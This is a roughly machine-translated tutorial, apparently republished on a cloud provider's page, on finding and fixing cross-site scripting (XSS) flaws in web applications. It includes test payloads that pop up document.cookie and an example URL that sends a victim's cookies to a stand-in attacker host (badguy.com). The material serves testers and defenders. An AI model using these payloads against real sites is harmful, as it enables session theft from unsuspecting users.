An XSS example of web security testing explains _javascript skills

Source: Internet
Author: User
Tags html encode html tags alphanumeric characters

Web Security Test XSS

XSS Full Name (Cross site scripting) Cross-site scripting attacks are the most common vulnerabilities in web programs.  When an attacker embeds a client script (such as JavaScript) in a Web page, the script executes on the user's browser when the user browses to the Web page, thus achieving the attacker's purpose. For example, get the user's cookies, navigate to malicious websites, carry Trojans and so on.

As testers, you need to understand the principles of XSS, attack scenarios, and how to fix them. Can effectively prevent the occurrence of XSS.

Reading Table of Contents

    1. How XSS is happening.
    2. HTML Encode
    3. XSS attack Scenario
    4. The fix of an XSS vulnerability
    5. How to test an XSS vulnerability
    6. The difference between HTML Encode and URL Encode
    7. XSS filters in the browser
    8. Asp. The XSS security mechanism in net

How is XSS happening?

If there is a textbox below

<input type= "text" name= "Address1" value= "Value1from" >

Value1from is input from the user, and if the user is not input value1from, instead enter "/><script>alert (document.cookie) </script><!- Then it will become

<input type= "text" name= "Address1" value= ""/><script>alert (Document.cookie) </script><!-">

Embedded JavaScript code will be executed

Or the user enters "onfocus=" alert (document.cookie), then it becomes

<input type= "text" name= "Address1" value= "" onfocus= "alert (document.cookie)" >

The embedded JavaScript code will be executed when the event is triggered

The power of the attack depends on what kind of script the user has entered

Of course, the data submitted by the user can also be sent to the server via QueryString (placed in the URL) and cookies. For example, the following figure

HTML Encode

XSS occurs because the data entered by the user becomes code. So we need to do HTML encode processing for the user input data. Encode special characters such as "brackets", "single quotes", "quotes", and so on.

Out-of-the-box methods are already available in C #, as long as you call Httputility.htmlencode ("string <scritp>"). (need to refer to system.web assembly)

Fiddler also provides a very convenient tool, click on the toolbar "Textwizard" button

XSS attack Scenario

1. The dom-based XSS vulnerability attack process is as follows

Tom found that one of the pages in victim.com had an XSS vulnerability,

For example: Http://victim.com/search.asp?term=apple

The code for the Search.asp page in the server is probably as follows

 
 

Tom first set up a website http://badguy.com, used to receive the "stolen" information.
Then Tom constructs a malicious URL (below) and sends it to Monica in some way (mail, QQ)

Http://victim.com/search.asp?term=<script>window.open ("http://badguy.com?cookie=" +document.cookie) </ Script>

Monica clicks on this URL, the malicious JavaScript code embedded in the URL will be executed in the Monica browser. Then Monica cookies on the victim.com Web site will be sent to the Badguy Web site. So Monica's information in victim.com was stolen by Tom.

2. Stored XSS (Storage XSS vulnerability), a vulnerability that is widely applied and potentially impacting the security of a large Web server, the attacker uploads the attack script to the Web server, making it possible for all users accessing the page to be exposed to information. The attack process is as follows

Alex found an XSS vulnerability on site A that allows the attack code to be saved in the database.

Alex published an article with malicious JavaScript code embedded in the article.

Other people like Monica visit this article, the malicious JavaScript code embedded in the article will be executed in the Monica Browser, and its session cookie or other information will be stolen by Alex.

dom-based XSS vulnerabilities threaten individual users, and a storage XSS vulnerability threatens a large number of users.

XSS Vulnerability Fixes

Principle: Do not trust the data entered by the customer

Note: The attack code is not necessarily in <script></script>

    1. Mark an important cookie as HTTP only so that the Document.cookie statement in JavaScript cannot get a cookie.
    2. Allows users to enter only the data we expect. For example: In a TextBox of age, only users are allowed to enter numbers. and the characters outside the numbers are filtered out.
    3. HTML Encode Processing of data
    4. Filter or remove special HTML tags, such as: <script>, <iframe>, < for;, > for
    5. Filters the labels for JavaScript events. such as "onclick=", "onfocus" and so on.

How to test an XSS vulnerability

Method One: Look at the code, look for the key variables, and the client transmits the data to the Web server generally in three ways QueryString, form forms, and cookies. For example, in an ASP program, the client's variables are obtained through the request object

<%
Strusercode = request.querystring ("code");
struser = Request.Form ("USER");
Strid = Request.Cookies ("ID");
%>

If the variable is not processed by HTMLEncode, then there is an XSS vulnerability to this variable

Method Two: Prepare the test script,

"/><script>alert (document.cookie) </script><!--
<script>alert (document.cookie) </ script><!--
"onclick=" alert (document.cookie)

In a TextBox or other place where you can enter data in a Web page, enter these test scripts to see if you can pop up a dialog box, and it will pop up to indicate an XSS vulnerability.

See those variables in the URL to pass the value to the Web server by URL, and return the values of these variables to our test script. and see if our script can execute.

Method Three: Automated test XSS vulnerabilities

There are already a lot of XSS scan tools available now. Implementing XSS Automation Testing is simple and requires only the HttpWebRequest class. Include XSS test scripts. Sent to the Web server. Then check to see if our XSS test script has been injected into the httpwebresponse.

The difference between HTML Encode and URL Encode

At first I always confuse these two things, in fact, this is two different things.

HTML encoding has been introduced before, about URL encoding is to conform to the specification of the URL. Because in the standard URL specification Chinese and a lot of characters are not allowed to appear in the URL.

For example, search for "test Chinese characters" in Baidu. The URL will become

http://www.baidu.com/s?wd=%B2%E2%CA%D4%BA%BA%D7%D6&rsv_bp=0&rsv_spt=3&inputT=7477

The so-called URL encoding is: All non-alphanumeric characters will be replaced with a percent sign (%) followed by a two-digit hexadecimal number, the space is encoded as a plus (+)

Out-of-the-box methods are already available in C #, as long as you call Httputility.urlencode ("string <scritp>"). (need to refer to system.web assembly)

Fiddler also provides a very convenient tool, click on the toolbar "Textwizard" button

XSS filters in the browser

To prevent XSS, many browser vendors are adding security to the browser to filter for XSS. For example, Ie8,ie9,firefox, Chrome. There are security mechanisms for XSS. Browsers can block XSS. For example, the following figure

If you need to do a test, it is best to use IE7.

Asp. The XSS security mechanism in net

Asp. NET has a mechanism for preventing XSS, the submitted form automatically checks for XSS, and when the user tries to enter the XSS code, the ASP. NET throws an error in the following figure

Many programmers have no concept of security, and don't even know that there is an XSS. Asp. NET to do the default security on this point. In this way, even a security-conscious programmer can write a "safer Web site".

If you want to disable this security feature, you can use the <%@ Page validaterequest= "false"%>

The above is the Web security test of XSS, follow-up to continue to collate relevant software testing materials, thank you for your support of this site!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.